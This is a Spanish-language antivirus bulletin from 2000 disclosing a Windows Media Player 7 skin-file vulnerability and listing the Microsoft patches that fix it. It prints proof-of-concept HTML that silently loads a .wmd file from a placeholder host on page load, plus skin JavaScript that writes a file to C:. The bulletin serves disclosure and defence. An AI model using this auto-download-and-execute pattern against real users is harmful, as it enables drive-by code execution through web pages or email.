|
VSantivirus No. 140 - Año 4 - Sábado 25 de noviembre de 2000
Vulnerabilidad en Microsoft Media Player 7 (y 6.4)
Modificado domingo 26 de noviembre de 2000
Una falla, descubierta por la empresa de seguridad GFI, afecta a las computadoras con Windows Me (Media Player está instalado aquí por defecto), y Windows 95, 98, NT y 2000, que tengan instalado además del Windows Media Player 7, el Internet Explorer (cualquier versión superior a la 3), Outlook Express 2000, Outlook Express 98, Outlook 2000, Outlook 98 y posiblemente cualquier otro cliente de correo que maneje HTML y javascript.
Según GFI, el problema permite a un usuario malicioso ejecutar un programa, con solo ver un sitio Web o un mensaje de correo con formato HTML.
La vulnerabilidad puede ser explotada, a través de un archivo en javascript (.js) embebido en un archivo de "pieles" (skins), una nueva característica introducida por Microsoft que permite modificar el diseño de la interface de la última versión de su reproductor multimedia Media Player 7 (archivos .wmz) y que también puede ser ocultado en un archivo de descarga de Windows Media (.wmd).
De este modo, el usuario no necesita ejecutar ningún archivo adjunto, debido a que el archivo de Media Player es ejecutado automáticamente usando la etiqueta "iframe" o la función "window.open()" con una etiqueta "<script>".
Estos son algunos ejemplos:
Ejemplo 1 (en un mensaje con formato)
<head>
<script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { file://v2.0
alert('Este ejemplo abrirá una nueva ventana\n
y automáticamente bajará el archivo wmd\n
y lo ejecutará. Este creará un archivo llamado\n
gfiseclab.txt en su disco C:\\');
window.open(theURL,winName,features);
}
file://-->
</script>
</head>
<body bgcolor="#FFFFFF"
onLoad="MM_openBrWindow('http://website/test.wmd',
'','width=0,height=0')">
</Embedded within an HTML e-mail>
Ejemplo 2 (en un mensaje con formato)
<html>
<body>
<script>
alert('Este ejemplo abrirá una nueva ventana\n
y automáticamente bajará el archivo wmd\n
y lo ejecutará. Este creará un archivo llamado\n
gfiseclab.txt en su disco C:\\')
</script>
<iframe src="http://website/test.wmd"></iframe></body>
</html>
El archivo "test.wmd" es un .ZIP que contiene los siguientes archivos:
* test.asx: metafile que apunta a un archivo mpg y al skin
con el "exploit"
* test.mpg: una película en formato mpeg.
* test.wmz: el skin con el "exploit".
El archivo "test.wmz" también es un archivo ZIP, conteniendo:
* test.js: un archivo en javascript con el siguiente código:
************************************
var fso, f1;
fso = new ActiveXObject("Scripting.FileSystemObject");
f1 = fso.CreateTextFile("C:\\gfiseclab.txt", true);
function onload(){
playAgain();
}
************************************
* test.wms: otro metafile que llama al archivo "test.js"
Solución:
Descargar los parches proporcionados por Microsoft en su boletín de seguridad
(MS00-090)
(“.ASX Buffer Overrun” and “.WMS Script Execution” Vulnerabilities)
Estos parches cubren además de esta vulnerabilidad, otra anterior, basada en un desbordamiento de búfer existente también en el Windows Media Player, pero que afecta las versiones 6.4 y 7.0, y ocurre cuando se manejan archivos con formato "Active Stream Redirector" (.ASX). Con esta falla, y a través de un archivo .ASX diseñado adecuadamente, que se puede hacer llegar a la computadora de la víctima a través del correo o de una página Web, se logra un desbordamiento de búfer (se sobrepasa el espacio asignado en memoria para guardar ciertos datos). Esto puede causar la ejecución de código malicioso, con el cuál se podría llegar a tomar el control de la computadora atacada.
El parche para esta segunda vulnerabilidad, correspondiente al Windows Media Player 6.4, está disponible en:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26069
El parche para ambas vulnerabilidades para Windows Media Player 7, está disponible en:
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=26079
Guía para descargar los parches del Windows Media Player
Si usted desea bajar los parches directamente, incluso usando
utilidades como GetRight, FlashGet, y otros, que permiten hacerlo en etapas, resumiendo desde el punto donde se dejó la instalación,
le ayudamos a hacerlo con esta guía:
Parche para Media Player 6.4
Nombre del archivo: wmsu33995.exe (484 Kb)
Parche para Media Player 7.0
Nombre del archivo: wmsu34419.EXE (1,501 Kb)
IMPORTANTE: Para instalar el parche para Media Player 7, se debe tener instalada antes la última versión de este programa, la número 1956 (puede averiguar que número de versión tiene, si abre en el Media Player 7, el menú Ayuda, y selecciona "Acerca de..").
Si tuviera una versión inferior a la 1956, antes de aplicar el parche, deberá bajar la última versión del MP7 en español:
Windows Media Player 7.0 versión 1956 en español
Nombre del archivo: wmp7.exe (9 Mb)
Nota: La instalación de los parches está en inglés, pero los archivos modificados son genéricos para todas las versiones, por lo que no hay problema en instalarlos sobre la versión en español del Media Player.
Fuentes:
http://www.gfi.com/press/memp7exploitpr.htm
http://www.microsoft.com/technet/security/bulletin/MS00-090.asp
Ver también:
18/dic/00 - El correo electrónico, el formato HTML, la música y los virus
16/ene/01 - Vulnerabilidad en Java con WMP 7 e IE
11/mar/01 - El IE puede revelar el contenido y la ubicación del cache
|
|